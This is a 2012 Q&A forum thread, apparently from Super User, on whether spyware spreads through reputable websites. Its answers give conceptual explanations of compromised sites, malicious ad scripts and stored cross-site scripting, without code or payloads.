Spyware from reputable websites?

3

I think I remember reading somewhere recently online that a surprisingly high percentage of spyware on computers is spread from reputable websites; you don't have to visit the Internet's "rough neighborhoods" to get infected. Is this true, and if so, where/how is this documented?

Mr. Jefferson

Posted 2012-08-07T15:22:32.720

Reputation: 682

Answers

4

Yes, it's a more common occurrence, and the only documentation I have is my antispyware logs showing rejects for malicious downloader attempts and html page source analysis on a VM that showed iframe injection code to exist on the site.

Wordpress if not properly maintained or secured means you are at risk of going to reputable blog sites only to be sent over to some infection engine that does a pretty thorough scan of your system to profile it for the most likely exploit application.

Cross site scripting also is employed and the site you are on doesn't even have to be compromised or hacked for this to work.

Fiasco Labs

Posted 2012-08-07T15:22:32.720

Reputation: 6 368

2The site might be reputable, but that doesn't mean the adspace in the reputable site is – Chad Harrison – 2012-08-07T16:12:53.283

Very true, so you have several shots at being taken out, compromised reputable site, reputable site with an XSS vulnerability or a reputable site hosting ads that get swapped for infectors. I've seen all the above in the last six months. – Fiasco Labs – 2012-08-07T16:54:12.360

I actually saw an injection method where Javascript brought in the ASCI representation of VBscript where the VBsript was later converted and invoked by the browser coming from Brazil. This came from an ad from reputable site (can't remember now). – Chad Harrison – 2012-08-07T17:35:44.293

4

The only documentation I read on this was by anti-malware or virus scanner companies. (Which should be the ones investigating this, but which also makes me doubt whatever they publish as this is in their favour. As we dutch say 'We from WC-Eend recommend WC-Eend to .....').

However there are at least three ways in which malware can get distributes by reputable websites:

  1. The website got compromised. It happens. Not often, but sometimes it happens. Usually because the websites software is not updated or not updated fast enough. (A known exploit can be used on the day it gets known. So you would need to check mailing lists and update daily. Not everybody does that, which means there is usually a window of vulnerability.
  2. The website runs scripts from other sites. E.g. ad banners. It includes these scripts from a remote location and has no control over these. Then the remote site gets hacked and the reputable site includes their code.
  3. Similar to point 2. But the add server decides to change their code to their advantage. (e.g. the obscured java script header which was served in LiveJournal for a while).

If you want to see if a site uses software from other server than the website itself, try the requestpolicy plugin for Firefox. It will give you some insight as to how often scripts and other sources get called from other websites.

Hennes

Posted 2012-08-07T15:22:32.720

Reputation: 60 739

I couldn't find anything in Google, could you give some back story on the LiveJournal incident? – Dan is Fiddling by Firelight – 2012-08-07T17:22:10.470

The LiveJournal incident is discussed on their tech support pages. They included javascript from a third party website which was intended to be benign code. It did not spread malware. It did cause problems with a few accounts who suddenly got unexplained referrer problems. That drew attention. The problem turned out to be caused by some obfuscated code included from a third party site (not even a local copy). Which means that side could have done anything. This was a year or two (?) ago. – Hennes – 2012-08-07T17:46:18.853

1

Found it! The full story is here: http://no-lj-ads.livejournal.com/87066.html

– Hennes – 2012-08-07T20:02:10.197

-1

There are a wide class of application security vulnerabilities known as "stored cross-site scripting", which generally means that, when you visit a website (regardless of its repute), some code that was not designed by the website owner begins executing on your computer. 99.9999% of the time, the code that starts executing is JavaScript. The JavaScript can sometimes successfully trigger the execution of other code, such as Flash, Java applets, ActiveX, and so on. They can also cause popups, install malicious tracking cookies, and obtain things like your screen size, user agent string, the website you came from, and may even be able to set up Cross Frame Scripting, a related attack where you think you're interacting with the current website but actually interacting with an attacker's website.

The reason why these attacks happen is that websites allow unvalidated input to be entered on the website, and then retrieved later for display. Sometimes this happens because of an insecure webserver, and sometimes they just don't do proper input validation.

This is extremely common on websites such as forums, message boards, and "Comments" sections of content management system (CMS) websites; basically, anywhere that users can enter their own data. Superuser, in fact, is one example of such a site.

There are ways to defend against and/or prevent these attacks, but they're extremely common. The Open Web Application Security Project says that Stored XSS is/was the #2 most dangerous application security flaw in 2010. It provides ways for website owners to attempt to test their website for these vulnerabilities using their tests, for example, here.

allquixotic

Posted 2012-08-07T15:22:32.720

Reputation: 32 256

Asked: 2012-08-07T15:22:32.720

Viewed: 294 times

Active: 2012-08-07T15:57:12.413